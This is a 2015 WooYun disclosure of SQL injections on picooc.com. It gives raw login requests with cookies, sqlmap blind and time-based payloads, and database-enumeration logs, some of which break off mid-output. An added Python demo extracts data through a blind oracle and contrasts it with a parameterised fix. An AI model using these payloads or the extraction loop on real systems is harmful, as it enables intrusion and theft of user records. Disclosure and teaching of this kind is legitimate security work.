Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0123773

Title: Multiple SQL injections on 有品网 (picooc.com), bundled submission (at least 13 databases involved, 710,000+ user records affected)

Vendor: picooc.com

Author: 天地不仁 以万物为刍狗

Submitted: 2015-07-01 09:49

Fixed: 2015-08-15 09:54

Published: 2015-08-15 09:54

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Bookmarks: 4


Vulnerability details

Disclosure status:

2015-07-01: details sent to the vendor, awaiting vendor action
2015-07-01: vendor confirmed; details visible to the vendor only
2015-07-11: details opened to core white hats and relevant domain experts
2015-07-21: details opened to regular white hats
2015-07-31: details opened to intern white hats
2015-08-15: details opened to the public

Summary:

Heaven and earth are not benevolent; they treat all things as straw dogs.
[HD] In the team's name and for personal honour, building cyber security together

Details:

1. POST request:

POST /picooc/admin/login.php HTTP/1.1
Content-Length: 99
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.picooc.com:80/
Cookie: PHPSESSID=5rqj5m2e3vgj1d5uk82sp596q6; Hm_lvt_973df559cb578de9c3c4b8c03b1a03a0=1435657707,1435657720,1435657731,1435657733; Hm_lpvt_973df559cb578de9c3c4b8c03b1a03a0=1435657733; HMACCOUNT=50E0F9300006484F
Host: www.picooc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
login=login&password=admin&username=admin


The username parameter is injectable; this point is easier to dump than the previous one.

0.png


1.png


So I dumped the picooc database (96 tables).

4.png


Saw a user table, counted its rows and got 717362. Let me ask: is that dayima_id what I think it is?

3.png


POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 531 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: login=login&password=admin&username=admin' AND 2537=2537 AND 'dGBa'='dGBa
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: login=login&password=admin&username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))AWel) AND 'sutb'='sutb
---
[18:43:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5.0.12
[18:43:41] [INFO] fetching database names
[18:43:41] [INFO] fetching number of databases
[18:43:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:43:41] [INFO] retrieved: 13
[18:43:43] [INFO] retrieved: information_schema
[18:43:59] [INFO] retrieved: cdcol
[18:44:05] [INFO] retrieved: geo
[18:44:08] [INFO] retrieved: mysql
[18:44:13] [INFO] retrieved: performance_schema
[18:44:34] [INFO] retrieved: picooc
[18:44:43] [INFO] retrieved: picooc_bak
[18:44:56] [INFO] retrieved: picooc_bbs
[18:45:04] [INFO] retrieved: picooc_cms
[18:45:12] [INFO] retrieved: picooc_dev
[18:45:20] [INFO] retrieved: picooc_pms
[18:45:27] [INFO] retrieved: picooc_www
[18:45:33] [INFO] retrieved: test
available databases [13]:
[*] cdcol
[*] geo
[*] information_schema
[*] mysql
[*] performance_schema
[*] picooc
[*] picooc_bak
[*] picooc_bbs
[*] picooc_cms
[*] picooc_dev
[*] picooc_pms
[*] picooc_www
[*] test
[18:45:44] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.picooc.com'
[*] shutting down at 18:45:44


2. http://www.picooc.com/picooc/web_interface/?last_id=1&method=ditu&ver=99
The last_id parameter is injectable.

0.png


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: last_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: last_id=1 AND 4846=4846&method=ditu&ver=99
---
[19:22:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5
[19:22:10] [INFO] fetching database names
[19:22:10] [INFO] fetching number of databases
[19:22:10] [INFO] resumed: 13
[19:22:10] [INFO] resumed: information_schema
[19:22:10] [INFO] resumed: cdcol
[19:22:10] [INFO] resumed: geo
[19:22:10] [INFO] resumed: m

Proof of vulnerability:

3. POST request:

POST /cmsadmin/php/action.php HTTP/1.1
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.picooc.com:80/
Cookie: PHPSESSID=5rqj5m2e3vgj1d5uk82sp596q6; Hm_lvt_973df559cb578de9c3c4b8c03b1a03a0=1435657707,1435657720,1435657731,1435657733; Hm_lpvt_973df559cb578de9c3c4b8c03b1a03a0=1435657733; HMACCOUNT=50E0F9300006484F
Host: www.picooc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=login&password=-1&username=wsirjsba


Both the password and username parameters are injectable; password is used for the demonstration here.

0.png


13 databases; dumping them all is too slow, so I didn't.

1.png


sqlmap identified the following injection points with a total of 422 HTTP(s) requests:
---
Parameter: password (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=login&password=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))EBvX) AND 'ZBYC'='ZBYC&username=wsirjsba
---
[18:38:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5.0.12
[18:38:14] [INFO] fetching database names
[18:38:14] [INFO] fetching number of databases
[18:38:14] [INFO] retrieved:
[18:38:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
13
[18:38:35] [INFO] retrieved: ii
[18:39:09] [INFO] retrieved:
[18:39:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:39:09] [INFO] retrieved:
[18:39:48] [ERROR] invalid character detected. retrying..
geo
[18:41:00] [INFO] retrieved: mysql
[18:42:47] [INFO] retrieved:
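The login-form injections in points 1 and 3 rest on one mechanism: the POST field is pasted into the SQL text, so sqlmap's wrapper `admin' AND <condition> AND 'dGBa'='dGBa` turns the login page into a yes/no oracle, and every "retrieved:" line above is that oracle being asked a few hundred times. The following is an added example written for this page, not code from the original report or from picooc.com. It rebuilds the pattern against an in-memory SQLite database with constructed sample data: the `admin` table, its columns and its one row are assumptions, as is the guess that the application fetches the row by username first and compares the password afterwards (the two different failure messages are what gives a boolean-based blind injection something to observe). It replays sqlmap's exact detection payload from point 1, extracts a string character by character the way sqlmap does, and puts the parameterised query that closes the hole beside the vulnerable one. SQLite's UNICODE/SUBSTR stand in for MySQL's ORD/MID; the time-based SLEEP payload has no SQLite equivalent and is not reproduced.

```python
import sqlite3

# Constructed stand-in for the admin login table behind /picooc/admin/login.php.
# Table, columns and row are assumptions for this example, not the site's schema.
SAMPLE_ROWS = [("admin", "S3cret!")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin (username, password) VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Assumed (not the site's source) login pattern that matches sqlmap's findings:
    the POST field is concatenated into the SQL, the row is fetched by username,
    and the password is compared in application code afterwards. The two distinct
    failure messages are the side channel a boolean-based blind injection needs."""
    sql = "SELECT password FROM admin WHERE username = '" + username + "'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return "no such user"
    if row[0] != password:
        return "wrong password"
    return "ok"


def login_fixed(conn, username, password):
    """Same logic with a parameterised query: the value travels separately from the
    statement text, so quotes and AND clauses in the input are compared literally."""
    row = conn.execute("SELECT password FROM admin WHERE username = ?", (username,)).fetchone()
    if row is None:
        return "no such user"
    if row[0] != password:
        return "wrong password"
    return "ok"


class BlindOracle:
    """Turns the login endpoint into a yes/no oracle for an arbitrary SQL condition,
    using the same wrapper as sqlmap's payload on the page: admin' AND <cond> AND 'dGBa'='dGBa."""

    def __init__(self, conn, login=login_vulnerable):
        self.conn = conn
        self.login = login
        self.requests = 0  # one "HTTP request" per question, cf. sqlmap's 531-request count

    def ask(self, condition):
        self.requests += 1
        payload = "admin' AND (" + condition + ") AND 'dGBa'='dGBa"
        # A true condition keeps the admin row in the result set, so the app goes on to the
        # password check; a false one drops the row and the app reports an unknown user.
        return self.login(self.conn, payload, "admin") == "wrong password"


def extract_string(oracle, subquery, max_len=64):
    """Boolean-based blind extraction of a string, bisecting each character's code point.
    SQLite functions are used; sqlmap's MySQL equivalent is ORD(MID(expr, i, 1)).
    Cost: one length probe per position plus log2(128) = 7 questions per character."""
    out = ""
    for i in range(1, max_len + 1):
        if not oracle.ask("LENGTH((" + subquery + ")) >= " + str(i)):
            break  # string exhausted
        lo, hi = 0, 127  # invariant: lo <= code point <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask("UNICODE(SUBSTR((" + subquery + "), " + str(i) + ", 1)) > " + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    true_cond = "admin' AND 2537=2537 AND 'dGBa'='dGBa"   # sqlmap's detection payload, point 1
    false_cond = "admin' AND 2537=2538 AND 'dGBa'='dGBa"
    print("vulnerable, true :", login_vulnerable(db, true_cond, "admin"))   # wrong password
    print("vulnerable, false:", login_vulnerable(db, false_cond, "admin"))  # no such user
    print("fixed, true      :", login_fixed(db, true_cond, "admin"))        # no such user
    o = BlindOracle(db)
    secret = extract_string(o, "SELECT password FROM admin WHERE username = 'admin'")
    print("extracted %r in %d requests" % (secret, o.requests))
```

Run it with `python3` and no other dependencies. The request count it prints is the point to take from the sqlmap logs above: each database name costs several questions per character, which is why the single-threaded run in point 1 spent roughly ten seconds per name, and why a 717,362-row user table behind the same oracle is fully readable given time. Against `login_fixed` the oracle never answers yes, so `extract_string` returns an empty string on its first length probe.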

Fix suggestion:

Copyright notice: when reposting, credit 天地不仁 以万物为刍狗@乌云


Responses

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-07-01 09:52

Vendor comment:

Thanks

Latest status:

None